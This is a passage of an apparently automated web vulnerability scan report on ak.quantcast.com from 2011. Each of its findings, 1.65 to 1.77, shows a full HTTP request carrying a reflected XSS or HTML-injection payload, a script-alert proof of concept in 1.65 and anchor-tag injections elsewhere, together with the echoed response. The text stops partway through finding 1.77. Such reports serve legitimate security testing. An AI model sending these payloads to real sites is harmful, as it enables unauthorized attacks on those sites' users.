<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" learning-center5bf22"><a>2129f6f3b4e case-studies study financial1 " />
...[SNIP]...

1.65. http://ak.quantcast.com/learning-center/case-studies/study/financial1/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ak.quantcast.com
Path:	/learning-center/case-studies/study/financial1/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd81"><script>alert(1)</script>79acaf7767d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fd81\"><script>alert(1)</script>79acaf7767d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /learning-center/case-studies/study/financial1/?6fd81"><script>alert(1)</script>79acaf7767d=1 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/audience
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; qcVisitor=2|97|1297445121784|16|NOTSET; __utma=27727020.780724242.1297445179.1297445179.1297448109.2; __utmc=27727020; __utmb=27727020.1.10.1297448109

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Fri, 11 Feb 2011 18:14:25 GMT
Date: Fri, 11 Feb 2011 18:14:25 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 32732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="quantcast" clas
...[SNIP]...
<a href="/learning-center/case-studies/study/financial1/?6fd81\"><script>alert(1)</script>79acaf7767d=1">
...[SNIP]...

1.66. http://ak.quantcast.com/wp-content/themes/quantcast/images/16x14-down_gray_arrow.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/wp-content/themes/quantcast/images/16x14-down_gray_arrow.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe347"><a>2c1e3cf5ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe347"><a>2c1e3cf5ef/themes/quantcast/images/16x14-down_gray_arrow.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/audience
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; __utma=27727020.780724242.1297445179.1297445179.1297445179.1; __utmb=27727020.23.8.1297446426489; qcVisitor=2|97|1297445121784|16|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:07 GMT
Connection: close
Content-Length: 17847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" fe347"><a>2c1e3cf5ef themes quantcast images 16x14-down_gray_arrow.gif" />
...[SNIP]...

1.67. http://ak.quantcast.com/wp-content/themes/quantcast/images/audience_what_can_it_do_middle.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/wp-content/themes/quantcast/images/audience_what_can_it_do_middle.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac80"><a>1047ec187e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cac80"><a>1047ec187e8/themes/quantcast/images/audience_what_can_it_do_middle.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/audience
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; __utma=27727020.780724242.1297445179.1297445179.1297445179.1; __utmb=27727020.23.8.1297446426489; qcVisitor=2|97|1297445121784|16|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:08 GMT
Connection: close
Content-Length: 17907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" cac80"><a>1047ec187e8 themes quantcast images audience_what_can_it_do_middle.gif" />
...[SNIP]...

1.68. http://ak.quantcast.com/wp-content/themes/quantcast/images/find.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/wp-content/themes/quantcast/images/find.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26655"><a>e7d1eef1f1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /26655"><a>e7d1eef1f1d/themes/quantcast/images/find.png?jcb=1288642643 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; __utma=27727020.780724242.1297445179.1297445179.1297445179.1; __utmb=27727020.23.8.1297446426489; qcVisitor=2|97|1297445121784|16|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:13:42 GMT
Connection: close
Content-Length: 17748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" 26655"><a>e7d1eef1f1d themes quantcast images find.png" />
...[SNIP]...

1.69. http://ak.quantcast.com/wp-content/themes/quantcast/images/home_search_gradient.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/wp-content/themes/quantcast/images/home_search_gradient.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c19e"><a>52bd0c85ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /1c19e"><a>52bd0c85ac/themes/quantcast/images/home_search_gradient.png?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; __utma=27727020.780724242.1297445179.1297445179.1297445179.1; __utmb=27727020.23.8.1297446426489; qcVisitor=2|97|1297445121784|16|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:13:43 GMT
Connection: close
Content-Length: 17841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" 1c19e"><a>52bd0c85ac themes quantcast images home_search_gradient.png" />
...[SNIP]...

1.70. http://ak.quantcast.com/wp-content/themes/quantcast/images/next_case.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/wp-content/themes/quantcast/images/next_case.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d63af"><a>5654fb39a1c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /d63af"><a>5654fb39a1c/themes/quantcast/images/next_case.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/learning-center/case-studies/study/financial1/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; qcVisitor=2|97|1297445121784|16|NOTSET; __utma=27727020.780724242.1297445179.1297445179.1297448109.2; __utmc=27727020; __utmb=27727020.1.10.1297448109

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:28 GMT
Connection: close
Content-Length: 17780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" d63af"><a>5654fb39a1c themes quantcast images next_case.gif" />
...[SNIP]...

1.71. http://ak.quantcast.com/wp-content/themes/quantcast/images/prev_case.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/wp-content/themes/quantcast/images/prev_case.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46811"><a>5ccb1221f02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /46811"><a>5ccb1221f02/themes/quantcast/images/prev_case.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/learning-center/case-studies/study/financial1/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; qcVisitor=2|97|1297445121784|16|NOTSET; __utma=27727020.780724242.1297445179.1297445179.1297448109.2; __utmc=27727020; __utmb=27727020.1.10.1297448109

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:28 GMT
Connection: close
Content-Length: 17781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" 46811"><a>5ccb1221f02 themes quantcast images prev_case.gif" />
...[SNIP]...

1.72. http://ak.quantcast.com/wp-content/themes/quantcast/images/sign_in.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/wp-content/themes/quantcast/images/sign_in.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeb69"><a>6eda385129b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /eeb69"><a>6eda385129b/themes/quantcast/images/sign_in.png?jcb=1288642643 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; __utma=27727020.780724242.1297445179.1297445179.1297445179.1; __utmb=27727020.23.8.1297446426489; qcVisitor=2|97|1297445121784|16|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:13:42 GMT
Connection: close
Content-Length: 17769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" eeb69"><a>6eda385129b themes quantcast images sign_in.png" />
...[SNIP]...

1.73. http://ak.quantcast.com/wp-content/themes/quantcast/images/sociable_email.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/wp-content/themes/quantcast/images/sociable_email.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7cf4"><a>62ff2efa404 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /b7cf4"><a>62ff2efa404/themes/quantcast/images/sociable_email.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/audience
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; __utma=27727020.780724242.1297445179.1297445179.1297445179.1; __utmb=27727020.23.8.1297446426489; qcVisitor=2|97|1297445121784|16|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:06 GMT
Connection: close
Content-Length: 17811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" b7cf4"><a>62ff2efa404 themes quantcast images sociable_email.gif" />
...[SNIP]...

1.74. http://ak.quantcast.com/wp-content/themes/quantcast/images/sociable_facebook.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/wp-content/themes/quantcast/images/sociable_facebook.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a0a5"><a>bb4b1cdca24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /3a0a5"><a>bb4b1cdca24/themes/quantcast/images/sociable_facebook.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; __utma=27727020.780724242.1297445179.1297445179.1297445179.1; __utmb=27727020.23.8.1297446426489; qcVisitor=2|97|1297445121784|16|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:13:41 GMT
Connection: close
Content-Length: 17829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" 3a0a5"><a>bb4b1cdca24 themes quantcast images sociable_facebook.gif" />
...[SNIP]...

1.75. http://ak.quantcast.com/wp-content/themes/quantcast/images/sociable_follow.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/wp-content/themes/quantcast/images/sociable_follow.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9305"><a>faebb275ac9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /c9305"><a>faebb275ac9/themes/quantcast/images/sociable_follow.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; __utma=27727020.780724242.1297445179.1297445179.1297445179.1; __utmb=27727020.23.8.1297446426489; qcVisitor=2|97|1297445121784|16|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:13:41 GMT
Connection: close
Content-Length: 17814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" c9305"><a>faebb275ac9 themes quantcast images sociable_follow.gif" />
...[SNIP]...

1.76. http://ak.quantcast.com/wp-content/themes/quantcast/images/sociable_print.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/wp-content/themes/quantcast/images/sociable_print.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3dab"><a>ad8f452dc64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /f3dab"><a>ad8f452dc64/themes/quantcast/images/sociable_print.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/audience
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; __utma=27727020.780724242.1297445179.1297445179.1297445179.1; __utmb=27727020.23.8.1297446426489; qcVisitor=2|97|1297445121784|16|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:14:07 GMT
Connection: close
Content-Length: 17810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" f3dab"><a>ad8f452dc64 themes quantcast images sociable_print.gif" />
...[SNIP]...

1.77. http://ak.quantcast.com/wp-content/themes/quantcast/images/sociable_rss.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/wp-content/themes/quantcast/images/sociable_rss.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b02eb"><a>05e13fd73f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /b02eb"><a>05e13fd73f3/themes/quantcast/images/sociable_rss.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
